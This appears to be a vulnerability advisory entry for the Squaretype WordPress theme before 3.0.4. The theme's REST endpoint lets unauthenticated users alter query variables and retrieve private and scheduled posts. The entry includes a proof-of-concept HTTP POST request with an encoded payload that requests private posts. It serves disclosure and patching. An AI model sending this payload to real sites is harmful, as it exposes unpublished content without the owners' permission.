Lucene search

K
wpvulndbEmil Kylander EdwartzWPVDB-ID:971302FD-4E8B-4C6A-818F-3A42C7FB83EF
HistoryOct 11, 2021 - 12:00 a.m.

Squaretype Modern Blog < 3.0.4 - Unauthenticated Private/Schedule Posts Disclosure

2021-10-1100:00:00
Emil Kylander Edwartz
wpscan.com
5

0.002 Low

EPSS

Percentile

53.4%

The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts to display in one of its REST endpoint, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request.

PoC

POST /wp-json/csco/v1/more-posts Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 186 action=csco_ajax_load_more&page;=1&posts;_per_page=10&query;_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d

CPENameOperatorVersion
squaretypelt3.0.4

0.002 Low

EPSS

Percentile

53.4%

Related for WPVDB-ID:971302FD-4E8B-4C6A-818F-3A42C7FB83EF